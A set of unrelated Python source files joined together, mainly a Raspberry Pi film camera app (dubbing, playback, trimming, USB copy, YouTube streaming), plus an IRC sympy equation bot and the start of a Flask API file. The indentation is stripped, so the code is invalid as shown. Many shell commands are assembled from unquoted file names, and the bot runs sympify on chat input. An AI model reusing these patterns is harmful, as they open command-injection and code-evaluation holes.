vumetermessage('press record, view or retake to start dubbing')
pressed = ''
buttonpressed = ''
buttontime = time.time()
holdbutton = ''
selected = 0
dubfiles = []
dubmix = []
dubmix_old = []
if scene:
header = 'Scene ' + str(scene) + ' dubbing settings'
filefolder = filmfolder + filmname + '/scene' + str(scene).zfill(3) + '/dub/'
dubfiles, dubmix, newmix = getdubs(filmfolder, filmname, scene)
else:
header = 'Film ' + filmname + ' dubbing settings'
filefolder = filmfolder + filmname + '/dub/'
dubfiles, dubmix, newmix = getdubs(filmfolder, filmname, '')
newdub = [1.0, 1.0, 0.1, 0.1]
dubselected = len(dubfiles) - 1
dubrecord = ''
while True:
nmix = round(newdub[0],1)
ndub = round(newdub[1],1)
nfadein = round(newdub[2],1)
nfadeout = round(newdub[3],1)
if dubfiles:
mix = round(dubmix[dubselected][0],1)
dub = round(dubmix[dubselected][1],1)
fadein = round(dubmix[dubselected][2],1)
fadeout = round(dubmix[dubselected][3],1)
menu = 'BACK', 'ADD:', '', '', 'DUB' + str(dubselected + 1) + ':', '', '', ''
settings = '', 'd:' + str(nmix) + '/o:' + str(ndub), 'in:' + str(nfadein), 'out:' + str(nfadeout), '', 'd:' + str(mix) + '/o' + str(dub), 'in:' + str(fadein), 'out:' + str(fadeout)
else:
menu = 'BACK', 'ADD:', '', ''
settings = '', 'd:' + str(nmix) + '/o:' + str(ndub), 'in:' + str(nfadein), 'out:' + str(nfadeout)
writemenu(menu,settings,selected,header)
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
#NEW DUB SETTINGS
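# The two levels act as a balance between the dub and the original track: "up" favours
# the dub (raising it back to full if it was lowered, then lowering the original),
# "down" favours the original. One of the two levels therefore always stays at 1.0.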
if pressed == 'up' and selected == 1:
if newdub[0] > 0.99 and newdub[1] > 0.01:
newdub[1] -= 0.1
if newdub[1] > 0.99 and newdub[0] < 0.99:
newdub[0] += 0.1
elif pressed == 'down' and selected == 1:
if newdub[1] > 0.99 and newdub[0] > 0.01:
newdub[0] -= 0.1
if newdub[0] > 0.99 and newdub[1] < 0.99:
newdub[1] += 0.1
elif pressed == 'up' and selected == 2:
newdub[2] += 0.1
elif pressed == 'down' and selected == 2:
if newdub[2] > 0.01:
newdub[2] -= 0.1
elif pressed == 'up' and selected == 3:
newdub[3] += 0.1
elif pressed == 'down' and selected == 3:
if newdub[3] > 0.01:
newdub[3] -= 0.1
elif pressed == 'record' and selected == 1:
dubmix.append(newdub)
dubrecord = filefolder + 'dub' + str(len(dubmix)).zfill(3) + '.wav'
break
#DUB SETTINGS
elif pressed == 'up' and selected == 4:
if dubselected + 1 < len(dubfiles):
dubselected = dubselected + 1
elif pressed == 'down' and selected == 4:
if dubselected > 0:
dubselected = dubselected - 1
elif pressed == 'remove' and selected == 4:
removedub(filefolder, dubselected + 1)
dubfiles, dubmix, newmix = getdubs(filmfolder, filmname, scene)
dubselected = len(dubfiles) - 1
if len(dubfiles) == 0:
selected = 0
elif pressed == 'record' and selected == 4:
dubrecord = filefolder + 'dub' + str(dubselected + 1).zfill(3) + '.wav'
break
elif pressed == 'up' and selected == 5:
if dubmix[dubselected][0] >= 0.99 and dubmix[dubselected][1] > 0.01:
dubmix[dubselected][1] -= 0.1
if dubmix[dubselected][1] >= 0.99 and dubmix[dubselected][0] < 0.99:
dubmix[dubselected][0] += 0.1
elif pressed == 'down' and selected == 5:
if dubmix[dubselected][1] >= 0.99 and dubmix[dubselected][0] > 0.01:
dubmix[dubselected][0] -= 0.1
if dubmix[dubselected][0] >= 0.99 and dubmix[dubselected][1] < 0.99:
dubmix[dubselected][1] += 0.1
elif pressed == 'up' and selected == 6:
dubmix[dubselected][2] += 0.1
elif pressed == 'down' and selected == 6:
if dubmix[dubselected][2] > 0.01:
dubmix[dubselected][2] -= 0.1
elif pressed == 'up' and selected == 7:
dubmix[dubselected][3] += 0.1
elif pressed == 'down' and selected == 7:
if dubmix[dubselected][3] > 0.01:
dubmix[dubselected][3] -= 0.1
elif pressed == 'right':
if selected < (len(settings) - 1):
selected = selected + 1
elif pressed == 'left':
if selected > 0:
selected = selected - 1
elif pressed == 'middle' and menu[selected] == 'BACK':
os.system('pkill aplay')
break
elif pressed == 'view': # mix dub and listen
run_command('pkill aplay')
dubfiles, dubmix, rerender = getdubs(filmfolder, filmname, scene)
if scene:
filename = filmfolder + filmname + '/scene' + str(scene).zfill(3) +'/scene'
else:
filename = filmfolder + filmname + '/' + filmname
renderfilename = renderfilm(filmfolder, filmname, 0, 0, False)
playdub(renderfilename, 'film')
time.sleep(0.05)
#Save dubmix before returning
if dubmix != dubmix_old:
if os.path.isdir(filefolder) == False:
os.makedirs(filefolder)
c = 1
for i in dubmix:
with open(filefolder + ".settings" + str(c).zfill(3), "w") as f:
for p in i:
f.write(str(round(p,1)) + '\n')
print(str(round(p,1)))
c += 1
dubmix_old = dubmix
return dubrecord
#---------------Play & DUB--------------------
def playdub(filename, player_menu):
global headphoneslevel, miclevel, plughw, channels
#omxplayer hack
os.system('rm /tmp/omxplayer*')
video = True
if player_menu == 'dub':
dub = True
else:
dub = False
if not os.path.isfile(filename + '.mp4'):
# should probably also check that it's not a corrupted video file
logger.info("no file to play")
if dub == True:
video = False
else:
return
t = 0
pressed = ''
buttonpressed = ''
buttontime = time.time()
holdbutton = ''
playing = False
pause = False
trim = False
videolag = 0
if video == True:
try:
player = OMXPlayer(filename + '.mp4', args=['--fps', '25', '--layer', '3', '--win', '0,70,800,410', '--no-osd', '--no-keys'], dbus_name='org.mpris.MediaPlayer2.omxplayer1', pause=True)
except:
writemessage('Something wrong with omxplayer')
time.sleep(2)
return
writemessage('Starting omxplayer')
clipduration = player.duration()
#sound
try:
playerAudio = OMXPlayer(filename + '.wav', args=['--adev','alsa:hw:'+str(plughw)], dbus_name='org.mpris.MediaPlayer2.omxplayer2', pause=True)
time.sleep(0.5)
except:
writemessage('something wrong with audio player')
time.sleep(2)
return
#omxplayer hack to play really short videos.
if clipduration < 4:
logger.info("clip duration shorter than 4 sec")
player.previous()
try:
if dub == True:
p = 0
while p < 3:
writemessage('Dubbing in ' + str(3 - p) + 's')
time.sleep(1)
p+=1
if video == True:
player.play()
#run_command('aplay -D plughw:0 ' + filename + '.wav &')
#run_command('mplayer ' + filename + '.wav &')
playerAudio.play()
if player_menu == 'dub':
run_command(tarinafolder + '/alsa-utils-1.1.3/aplay/arecord -D plughw:'+str(plughw)+' -f S16_LE -c '+str(channels)+' -r44100 -vv /dev/shm/dub.wav &')
except:
logger.info('something wrong with omxplayer')
#logger.warning(e)
return
starttime = time.time()
selected = 1
while True:
if trim == True:
menu = 'CANCEL', 'FROM BEGINNING', 'FROM END'
settings = '','',''
elif pause == True:
if player_menu == 'shot':
menu = 'BACK', 'PLAY', 'REPLAY', 'TRIM'
settings = '','','',''
else:
menu = 'BACK', 'PLAY', 'REPLAY'
settings = '','',''
elif player_menu == 'dub':
menu = 'BACK', 'REDUB', 'PHONES:', 'MIC:'
settings = '', '', str(headphoneslevel), str(miclevel)
else:
menu = 'BACK', 'PAUSE', 'REPLAY', 'PHONES:'
settings = '', '', '', str(headphoneslevel)
if dub == True:
header = 'Dubbing ' + str(round(t,1))
else:
header = 'Playing ' + str(round(t,1)) + ' of ' + str(clipduration) + ' s'
writemenu(menu,settings,selected,header)
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
if buttonpressed == True:
flushbutton()
if pressed == 'right':
if selected < (len(settings) - 1):
selected = selected + 1
elif pressed == 'left':
if selected > 0:
selected = selected - 1
elif pressed == 'up':
if menu[selected] == 'PHONES:':
if headphoneslevel < 100:
headphoneslevel = headphoneslevel + 2
run_command('amixer -c 0 sset Speaker ' + str(headphoneslevel) + '%')
elif menu[selected] == 'MIC:':
if miclevel < 100:
miclevel = miclevel + 2
run_command('amixer -c 0 sset Mic ' + str(miclevel) + '% unmute')
else:
try:
player.set_position(t+2)
playerAudio.set_position(player.position())
except:
return
elif pressed == 'down':
if menu[selected] == 'PHONES:':
if headphoneslevel > 0:
headphoneslevel = headphoneslevel - 2
run_command('amixer -c 0 sset Speaker ' + str(headphoneslevel) + '%')
elif menu[selected] == 'MIC:':
if miclevel > 0:
miclevel = miclevel - 2
run_command('amixer -c 0 sset Mic ' + str(miclevel) + '% unmute')
else:
if t > 1:
try:
player.set_position(t-2)
playerAudio.set_position(player.position())
except:
return
elif pressed == 'middle':
time.sleep(0.2)
if menu[selected] == 'BACK' or player.playback_status() == "Stopped":
try:
if video == True:
try:
player.stop()
playerAudio.stop()
player.quit()
playerAudio.quit()
except:
return
os.system('pkill aplay')
except:
# kill it if it doesn't stop
os.system('pkill dbus-daemon')
os.system('pkill omxplayer')
if dub == True:
os.system('pkill arecord')
time.sleep(0.2)
return
elif menu[selected] == 'REPLAY' or menu[selected] == 'REDUB':
pause = False
try:
os.system('pkill aplay')
if dub == True:
os.system('pkill arecord')
if video == True:
try:
player.pause()
playerAudio.pause()
player.set_position(0)
playerAudio.set_position(0)
except:
return
if dub == True:
p = 0
while p < 3:
writemessage('Dubbing in ' + str(3 - p) + 's')
time.sleep(1)
p+=1
try:
player.play()
playerAudio.play()
except:
return
#run_command('aplay -D plughw:0 ' + filename + '.wav &')
if dub == True:
run_command(tarinafolder + '/alsa-utils-1.1.3/aplay/arecord -D plughw:'+str(plughw)+' -f S16_LE -c '+str(channels)+' -r44100 -vv /dev/shm/dub.wav &')
except:
pass
starttime = time.time()
elif menu[selected] == 'PAUSE':
try:
player.pause()
playerAudio.pause()
pause = True
except:
pass
elif menu[selected] == 'PLAY':
try:
player.play()
playerAudio.play()
except:
return
pause = False
elif menu[selected] == 'TRIM':
selected = 1
trim = True
elif menu[selected] == 'CANCEL':
selected = 1
trim = False
elif menu[selected] == 'FROM BEGINNING':
trim = ['beginning', player.position()]
player.quit()
playerAudio.quit()
return trim
elif menu[selected] == 'FROM END':
trim = ['end', player.position()]
player.quit()
playerAudio.quit()
return trim
time.sleep(0.02)
if pause == False:
try:
t = player.position()
except:
os.system('pkill aplay')
if dub == True:
os.system('pkill arecord')
break
player.quit()
playerAudio.quit()
#os.system('pkill dbus-daemon')
#---------------View Film--------------------
def viewfilm(filmfolder, filmname):
scenes, shots, takes = countlast(filmname, filmfolder)
scene = 1
filmfiles = []
while scene <= scenes:
shots = countshots(filmname, filmfolder, scene)
if shots > 0:
filmfiles.extend(shotfiles(filmfolder, filmname, scene))
scene = scene + 1
return filmfiles
#---------------Video Trim--------------------
def videotrim(filename, trim_filename, where, s):
# there are two different non-re-encoding mp4 cut techniques that I know of: MP4Box and ffmpeg
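# Rough idea of the two approaches (both avoid re-encoding): the commented-out ffmpeg
# lines below use stream copy with -ss/-to to drop everything outside the range, while
# MP4Box -splitx START:end extracts the requested span by rewriting the MP4 container.
# Both cut on keyframes, so the trim is only accurate to the nearest keyframe.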
if where == 'beginning':
logger.info('trimming clip from beginning')
#run_command('ffmpeg -ss ' + str(s) + ' -i ' + filename + '.mp4 -c copy ' + trim_filename + '.mp4')
run_command('MP4Box ' + filename + '.mp4 -splitx ' + str(s) + ':end -out ' + trim_filename + '.mp4')
run_command('cp ' + filename + '.wav ' + trim_filename + '.wav')
audiotrim(trim_filename, 'beginning')
if where == 'end':
logger.info('trimming clip from end')
#run_command('ffmpeg -to ' + str(s) + ' -i ' + filename + '.mp4 -c copy ' + trim_filename + '.mp4')
run_command('MP4Box ' + filename + '.mp4 -splitx 0:' + str(s) + ' -out ' + trim_filename + '.mp4')
run_command('cp ' + filename + '.wav ' + trim_filename + '.wav')
audiotrim(trim_filename, 'end')
#take last frame
run_command('ffmpeg -sseof -1 -i ' + trim_filename + '.mp4 -update 1 -q:v 1 -vf scale=800:340 ' + trim_filename + '.jpeg')
return
#--------------Get Audio cards--------------
def getaudiocards():
with open("/proc/asound/cards") as fp:
cards = fp.readlines()
audiocards = []
for i in cards:
if i[1] in ['0','1','2','3']:
print('audio card ' + i[1] + ': ' + i[22:].rstrip('\n'))
audiocards.append(i[22:].rstrip('\n'))
return audiocards
#--------------Audio Trim--------------------
# make the audio file the same length as the video file
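# Worked example of the sync logic below: if the wav is 120 ms longer than the mp4,
# 0.120 s is trimmed from the chosen end, a 10 ms fade is applied and 'A120' is
# returned; if the video is 120 ms longer, 0.120 s of silence is generated and joined
# with the (faded) audio so the lengths match, and 'V120' is returned. The returned
# string just encodes which track was longer and by how many milliseconds.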
def audiotrim(filename, where):
writemessage('Audio syncing..')
pipe = subprocess.check_output('mediainfo --Inform="Video;%Duration%" ' + filename + '.mp4', shell=True)
videolenght = pipe.decode().strip()
pipe = subprocess.check_output('mediainfo --Inform="Audio;%Duration%" ' + filename + '.wav', shell=True)
audiolenght = pipe.decode().strip()
# if there is no audio length
logger.info('audio is: ' + audiolenght)
if not audiolenght.strip():
audiolenght = 0
#separate seconds and milliseconds
#videoms = int(videolenght) % 1000
#audioms = int(audiolenght) % 1000
#videos = int(videolenght) / 1000
#audios = int(audiolenght) / 1000
if int(audiolenght) > int(videolenght):
#calculate difference
audiosync = int(audiolenght) - int(videolenght)
newaudiolenght = int(audiolenght) - audiosync
logger.info('Audiofile is: ' + str(audiosync) + 'ms longer')
#trim from end or beginning and put a 0.01 in- and outfade
if where == 'end':
run_command('sox -V0 ' + filename + '.wav ' + filename + '_temp.wav trim 0 -' + str(int(audiosync)/1000))
if where == 'beginning':
run_command('sox -V0 ' + filename + '.wav ' + filename + '_temp.wav trim ' + str(int(audiosync)/1000))
run_command('sox -V0 -G ' + filename + '_temp.wav ' + filename + '.wav fade 0.01 0 0.01')
os.remove(filename + '_temp.wav')
#if int(audiosync) > 400:
# writemessage('WARNING!!! VIDEO FRAMES DROPPED!')
# vumetermessage('Consider changing to a faster microsd card.')
# time.sleep(10)
delayerr = 'A' + str(audiosync)
else:
audiosync = int(videolenght) - int(audiolenght)
#calculate difference
#audiosyncs = videos - audios
#audiosyncms = videoms - audioms
#if audiosyncms < 0:
# if audiosyncs > 0:
# audiosyncs = audiosyncs - 1
# audiosyncms = 1000 + audiosyncms
logger.info('Videofile is: ' + str(audiosync) + 'ms longer')
#make fade
run_command('sox -V0 -G ' + filename + '.wav ' + filename + '_temp.wav fade 0.01 0 0.01')
#make delay file
run_command('sox -V0 -n -r 44100 -c 1 /dev/shm/silence.wav trim 0.0 ' + str(int(audiosync)/1000))
# pad the audio with silence to match the video length
run_command('sox -V0 /dev/shm/silence.wav ' + filename + '_temp.wav ' + filename + '.wav')
os.remove(filename + '_temp.wav')
os.remove('/dev/shm/silence.wav')
delayerr = 'V' + str(audiosync)
#os.remove('/dev/shm/' + filename + '.wav')
return delayerr
#os.system('mv audiosynced.wav ' + filename + '.wav')
#os.system('rm silence.wav')
#--------------Audiosilence--------------------
# make an empty audio file as long as a video file
def audiosilence(foldername,filename):
writemessage('Creating audiosilence..')
pipe = subprocess.check_output('mediainfo --Inform="Video;%Duration%" ' + foldername + filename + '.mp4', shell=True)
videolenght = pipe.decode()
logger.info('Video length is ' + videolenght)
#separate seconds and milliseconds
videoms = int(videolenght) % 1000
videos = int(videolenght) / 1000
logger.info('Videofile is: ' + str(videos) + 's ' + str(videoms))
run_command('sox -V0 -n -r 44100 -c 1 /dev/shm/silence.wav trim 0.0 ' + str(videos))
os.system('cp /dev/shm/silence.wav ' + foldername + filename + '.wav')
os.system('rm /dev/shm/silence.wav')
#--------------Copy to USB-------------------
def copytousb(filmfolder):
pressed = ''
buttonpressed = ''
buttontime = time.time()
holdbutton = ''
writemessage('Searching for usb storage device, middlebutton to cancel')
films = getfilms(filmfolder)
while True:
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
usbconnected = os.path.ismount('/media/usb0')
if pressed == 'middle':
writemessage('canceling..')
time.sleep(2)
break
time.sleep(0.02)
if usbconnected == True:
#Copy new files to usb device
try:
os.makedirs('/media/usb0/tarinafilms/')
except:
pass
try:
p = subprocess.check_output('stat -f -c %T /media/usb0', shell=True)
filesystem = p.decode()
print('filesystem info: ' + filesystem)
except:
writemessage("Oh no! Don't know your filesystem")
waitforanykey()
return
for filmname in films:
#check filmhash
filmname = filmname[0]
usbpath = '/media/usb0/tarinafilms/'+filmname
usbfilmhash = ''
filmhash = ''
while True:
if os.path.exists(usbpath) == False:
break
try:
with open(filmfolder + filmname + '/.filmhash', 'r') as f:
filmhash = f.readline().strip()
print('filmhash is: ' + filmhash)
except:
print('no filmhash found!')
try:
with open(usbpath + '/.filmhash', 'r') as f:
usbfilmhash = f.readline().strip()
print('usbfilmhash is: ' + usbfilmhash)
except:
print('no usbfilmhash found!')
if usbfilmhash == filmhash:
print('same moviefilm found, updating clips...')
break
else:
writemessage('Found a subsequent moviefilm...')
print('same film name exists with a different filmhash, copying to a separate film folder')
time.sleep(2)
usbpath += '_new'
try:
os.makedirs(usbpath)
writemessage('Copying film ' + filmname + '...')
except:
writemessage('Found existing ' + filmname + ', copying new files... ')
try:
run_command('rsync -avr -P ' + filmfolder + filmname + '/ ' + usbpath)
except:
writemessage("couldn't copy film " + filmname)
waitforanykey()
return
run_command('sync')
run_command('pumount /media/usb0')
writemessage('all files copied successfully!')
waitforanykey()
writemessage('You can safely unplug the usb device now')
time.sleep(2)
return
#-----------Check for the webz---------
def webz_on():
try:
# connect to the host -- tells us if the host is actually
# reachable
socket.create_connection(("google.com", 80))
return True
except OSError:
pass
writemessage('No internet connection!')
time.sleep(2)
return False
#-------------Upload film------------
def uploadfilm(filename, filmname):
pressed = ''
buttonpressed = ''
buttontime = time.time()
holdbutton = ''
mods = ['Back']
settings = ['']
writemessage('Searching for upload mods')
with open(tarinafolder + '/mods/upload-mods-enabled') as m:
mods.extend(m.read().splitlines())
for m in mods:
settings.append('')
menu = mods
selected = 0
while True:
header = 'Where do you want to upload?'
writemenu(menu,settings,selected,header)
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
if pressed == 'right':
if selected < (len(menu) - 1):
selected = selected + 1
elif pressed == 'left':
if selected > 0:
selected = selected - 1
elif pressed == 'middle' and menu[selected] == 'Back':
return None
elif pressed == 'middle' and menu[selected] in mods:
cmd = tarinafolder + '/mods/' + menu[selected] + '.sh ' + filmname + ' ' + filename + '.mp4'
return cmd
time.sleep(0.02)
#-------------Streaming---------------
def startstream(camera, stream, plughw, channels):
youtube="rtmp://a.rtmp.youtube.com/live2/"
with open("/home/pi/.youtube-live") as fp:
key = fp.readlines()
print('using key: ' + key[0])
stream_cmd = 'ffmpeg -f h264 -r 25 -i - -itsoffset 5.5 -fflags nobuffer -f alsa -ac '+str(channels)+' -i hw:'+str(plughw)+' -ar 44100 -vcodec copy -acodec libmp3lame -b:a 128k -ar 44100 -map 0:0 -map 1:0 -strict experimental -f flv ' + youtube + key[0]
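# Pipeline sketch of the command above: raw H.264 from the camera is piped in on stdin
# ('-f h264 -i -'), ALSA capture provides the audio ('-f alsa -i hw:N'), the video is
# passed through untouched ('-vcodec copy') while the audio is encoded to 128k MP3, and
# the muxed result is pushed as FLV to the YouTube RTMP ingest URL plus the stream key
# read from the first line of /home/pi/.youtube-live.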
try:
stream = subprocess.Popen(stream_cmd, shell=True, stdin=subprocess.PIPE)
camera.start_recording(stream.stdin, format='h264', bitrate = 2000000)
except:
stream = ''
#now = time.strftime("%Y-%m-%d-%H:%M:%S")
return stream
def stopstream(camera, stream):
camera.stop_recording()
os.system('pkill -9 ffmpeg')
print("Camera safely shut down")
print("Good bye")
stream = ''
return stream
#-------------Beeps-------------------
def beep():
buzzerrepetitions = 100
buzzerdelay = 0.00001
for _ in range(buzzerrepetitions):
for value in [0xC, 0x4]:
#GPIO.output(1, value)
bus.write_byte_data(DEVICE,OLATA,value)
time.sleep(buzzerdelay)
return
def longbeep():
buzzerrepetitions = 100
buzzerdelay = 0.0001
for _ in range(buzzerrepetitions * 5):
for value in [0xC, 0x4]:
#GPIO.output(1, value)
bus.write_byte_data(DEVICE,OLATA,value)
buzzerdelay = buzzerdelay - 0.00000004
time.sleep(buzzerdelay)
bus.write_byte_data(DEVICE,OLATA,0x4)
return
def buzz(buzzerlenght):
buzzerdelay = 0.0001
for _ in range(buzzerlenght):
for value in [0xC, 0x4]:
#GPIO.output(1, value)
bus.write_byte_data(DEVICE,OLATA,value)
time.sleep(buzzerdelay)
return
#---------reading in a lens shading table----------
def read_table(inFile):
# q&d-way to read in ls_table.h
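# Expected input, judging by the parser below: a C header roughly like
#   uint8_t ls_grid[] = {
#   // R (one comment line per colour plane)
#   32, 32, 32, ...
#   };
# Lines starting with "uint" or "}" are skipped, a "//" comment starts a new colour
# plane, and every other line is read as a row of comma-separated integers.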
ls_table = []
channel = []
with open(inFile) as file:
for line in file:
# we skip the unimportant stuff
if not ( line.startswith("uint") \
or line.startswith("}")):
# the comments separate the color planes
if line.startswith("//"):
channel = []
ls_table.append(channel)
else:
# scan in a single line
line = line.replace(',','')
lineData = [int(x) for x in line.split()]
channel.append(lineData)
return np.array(ls_table,dtype=np.uint8)
#-------------Check if file empty----------
def empty(filename):
if os.path.isfile(filename + '.mp4') == False:
return False
if os.path.isfile(filename + '.mp4') == True:
writemessage('Take already exists')
time.sleep(2)
return True
#--------------BUTTONS-------------
def waitforanykey():
vumetermessage("press any key to continue..")
time.sleep(1)
while True:
with term.cbreak():
val = term.inkey(timeout=0)
if not val:
event = ''
elif val.is_sequence:
event = val.name
elif val:
event = val
if i2cbuttons == True:
readbus = bus.read_byte_data(DEVICE,GPIOB)
readbus2 = bus.read_byte_data(DEVICE,GPIOA)
else:
readbus = 255
readbus2 = 247
if readbus != 255 or readbus2 != 247 or event != '':
time.sleep(0.05)
vumetermessage(' ')
return
def middlebutton():
with term.cbreak():
val = term.inkey(timeout=0)
if val.is_sequence:
event = val.name
#print(event)
elif val:
event = val
#print(event)
else:
event = ''
if i2cbuttons == True:
readbus = bus.read_byte_data(DEVICE,GPIOB)
readbus2 = bus.read_byte_data(DEVICE,GPIOA)
if readbus != 255:
print('i2cbutton pressed: ' + str(readbus))
if readbus2 != 247:
print('i2cbutton pressed: ' + str(readbus2))
else:
readbus = 255
readbus2 = 247
pressed = ''
if event == 'KEY_ENTER' or event == 10 or event == 13 or (readbus == 247 and readbus2 == 247):
pressed = 'middle'
return True
return False
def flushbutton():
with term.cbreak():
while True:
inp = term.inkey(timeout=0)
print('flushing ' + repr(inp))
if inp == '':
break
def getbutton(lastbutton, buttonpressed, buttontime, holdbutton):
with term.cbreak():
val = term.inkey(timeout=0)
if val.is_sequence:
event = val.name
#print(event)
elif val:
event = val
#print(event)
else:
event = ''
keydelay = 0.08
if i2cbuttons == True:
readbus = bus.read_byte_data(DEVICE,GPIOB)
readbus2 = bus.read_byte_data(DEVICE,GPIOA)
if readbus != 255:
print('i2cbutton pressed: ' + str(readbus))
if readbus2 != 247:
print('i2cbutton pressed: ' + str(readbus2))
else:
readbus = 255
readbus2 = 247
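# The readbus values appear to come from an I2C port expander where each button pulls
# one input bit low: 255 (all bits high) is the idle value for the first register and
# 247 for the second, and every comparison below matches the bit pattern produced by
# one physical button (e.g. 191 = bit 6 pulled low for 'up').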
pressed = ''
if buttonpressed == False:
if event == 27:
pressed = 'quit'
elif event == 'KEY_ENTER' or event == 10 or event == 13 or (readbus == 247 and readbus2 == 247):
pressed = 'middle'
elif event == 'KEY_UP' or (readbus == 191 and readbus2 == 247):
pressed = 'up'
elif event == 'KEY_DOWN' or (readbus == 254 and readbus2 == 247):
pressed = 'down'
elif event == 'KEY_LEFT' or (readbus == 239 and readbus2 == 247):
pressed = 'left'
elif event == 'KEY_RIGHT' or (readbus == 251 and readbus2 == 247):
pressed = 'right'
elif event == 'KEY_PGUP' or event == ' ' or (readbus == 127 and readbus2 == 247):
pressed = 'record'
elif event == 'KEY_PGDOWN' or (readbus == 253 and readbus2 == 247):
pressed = 'retake'
elif event == 'KEY_TAB' or (readbus == 223 and readbus2 == 247):
pressed = 'view'
elif event == 'KEY_DELETE' or readbus2 == 246:
pressed = 'remove'
elif event == 'P' or (readbus2 == 245 and readbus == 191):
pressed = 'peak'
elif event == 'I' or (readbus2 == 244 and readbus == 255):
pressed = 'insert'
elif event == 'C' or (readbus2 == 245 and readbus == 254):
pressed = 'copy'
elif event == 'M' or (readbus2 == 245 and readbus == 253):
pressed = 'move'
#elif readbus2 == 247:
# pressed = 'shutdown'
buttontime = time.time()
holdbutton = pressed
buttonpressed = True
if readbus == 255 and event == '':
buttonpressed = False
if float(time.time() - buttontime) > 0.2 and buttonpressed == True:
if holdbutton == 'up' or holdbutton == 'down' or holdbutton == 'right' or holdbutton == 'left' or holdbutton == 'shutdown' or holdbutton == 'remove':
pressed = holdbutton
keydelay = 0.06
if time.time() - buttontime > 2 and buttonpressed == True:
keydelay = 0.02
if time.time() - buttontime > 4 and buttonpressed == True:
keydelay = 0.01
return pressed, buttonpressed, buttontime, holdbutton, event, keydelay
def startinterface():
call(['./startinterface.sh &'], shell = True)
def stopinterface(camera):
camera.stop_preview()
camera.close()
os.system('pkill arecord')
os.system('pkill startinterface')
os.system('pkill tarinagui')
run_command('sudo systemctl stop apache2')
def startcamera(lens):
camera = picamera.PiCamera()
camera.resolution = (1920, 816) #tested modes 1920x816, 1296x552/578, v2 1640x698, 1640x1232
#lensshade = ''
#npzfile = np.load('lenses/' + lens)
#lensshade = npzfile['lens_shading_table']
#camera.framerate = 24.999
camera_model, camera_revision = getconfig(camera)
# v1 = 'ov5647'
# v2 = ?
logger.info("picamera version is: " + camera_model + ' ' + camera_revision)
if camera_model == 'imx219':
table = read_table('lenses/' + lens)
camera.lens_shading_table = table
camera.framerate = 24.999
if camera_model == 'ov5647':
table = read_table('lenses/' + lens)
camera.lens_shading_table = table
# Different versions of the ov5647 run at different clock speeds, so this needs a config file.
# If there are more frames than expected the video ends up longer when converted to 25 fps,
# so these values were tuned by trial and error to get as close as possible.
# ov5647 Rev C
if camera_revision == 'rev.C':
camera.framerate = 26.03
# ov5647 Rev D
elif camera_revision == 'rev.D':
camera.framerate = 23.15
else:
camera.framerate = 24.999
camera.crop = (0, 0, 1.0, 1.0)
camera.video_stabilization = True
camera.led = False
#lens_shading_table = np.zeros(camera._lens_shading_table_shape(), dtype=np.uint8) + 32
#camera.lens_shading_table = lens_shading_table
camera.start_preview()
camera.awb_mode = 'auto'
return camera
def tarinaserver(state):
#Tarina server
if state == True:
#Try to run apache
try:
run_command('sudo systemctl start apache2')
return 'on'
except:
writemessage("could not run tarina server")
time.sleep(2)
return 'off'
if state == False:
run_command('sudo systemctl stop apache2')
return 'off'
if __name__ == '__main__':
import sys
try:
main()
except:
os.system('pkill arecord')
os.system('pkill startinterface')
os.system('pkill tarinagui')
print('Unexpected error : ', sys.exc_info()[0], sys.exc_info()[1])
|
sympy.py
|
# -*- coding: utf-8 -*-
import logging
import multiprocessing
try:
from sympy.solvers import solve
from sympy import Symbol
from sympy.core import sympify
except ImportError:
logging.error("m_sympy: Sympy no está instalado.")
class sympy:
def __init__(self, core, client):
try:
solve
except:
return
core.addCommandHandler("calcx", self, chelp="Resuelve X en una ecuación"
". Sintaxis: calcx <ecuación>")
core.addCommandHandler("calcxy", self, chelp="Resuelve X e Y en una ecu"
"ación. Sintaxis: calcxy <ecuación>")
self.q = multiprocessing.Queue()
def calcx(self, bot, cli, ev):
if len(ev.splitd) < 1:
    cli.msg(ev.target, "Error: missing parameters")
    return
expr = " ".join(ev.splitd)
expr = "(" + expr
expr = expr.replace("=", ") - (")
expr = expr + ")"
pr = sympify(expr)
x = Symbol('x')
#res = solve(pr, x)
res = self.try_slow_thing(self.calcx_, self.q, pr, x)
cli.msg(ev.target, str(res))
def calcxy(self, bot, cli, ev):
if len(ev.splitd) < 1:
    cli.msg(ev.target, "Error: missing parameters")
    return
expr = " ".join(ev.splitd)
expr = "(" + expr
expr = expr.replace("=", ") - (")
expr = expr + ")"
try:
pr = sympify(expr)
except:
cli.msg(ev.target, "Error de sintaxis o algo por el estilo.")
return 0
x = Symbol('x')
y = Symbol('y')
#res = solve(pr, x, y)
res = self.try_slow_thing(self.calcxy_, self.q, pr, x, y)
cli.msg(ev.target, str(res))
def calcxy_(self, q, pr, x, y):
res = solve(pr, x, y)
q.put(str(res))
def calcx_(self, q, pr, x):
res = solve(pr, x)
q.put(str(res))
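# try_slow_thing below is a simple timeout guard: the solve runs in a separate process,
# the caller waits up to 5 seconds, and if the worker is still alive it is terminated
# and a timeout message is returned instead of the result from the shared queue.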
def try_slow_thing(self, function, *args):
p = multiprocessing.Process(target=function, args=args)
p.start()
p.join(5)
if p.is_alive():
p.terminate()
return "La operación se demoro mucho"
else:
return self.q.get(True)
|
api.py
|
# -*- coding: utf-8 -*-
"""
api
~~~
Implements API Server and Interface
:author: Feei <[email protected]>
:homepage: https://github.com/wufeifei/cobra
:license: MIT, see LICENSE for more details.
:copyright: Copyright (c) 2017 Feei. All rights reserved
"""
import socket
import errno
import time
import os
import json
import multiprocessing
import threading
from flask import Flask, request, render_template
from flask_restful import Api, Resource
from . import cli
from .cli import get_sid
from .engine import Running
from .log import logger
from .config import Config, running_path
try:
# Python 3
import queue
except ImportError:
# Python 2
import Queue as queue
q = queue.Queue()
app = Flask(__name__, static_folder='templates/asset')
def producer(task):
q.put(task)
def consumer():
while True:
task = q.get()
p = multiprocessing.Process(target=cli.start, args=task)
p.start()
p.join()
q.task_done()
class AddJob(Resource):
@staticmethod
def post():
data = request.json
if not data or data == "":
return {"code": 1003, "result": "Only support json, please post json data."}
target = data.get("target")
formatter = data.get("formatter")
output = data.get("output")
rule = data.get("rule")
is_valid_key = key_verify(data=data)
if is_valid_key is not True:
return is_valid_key
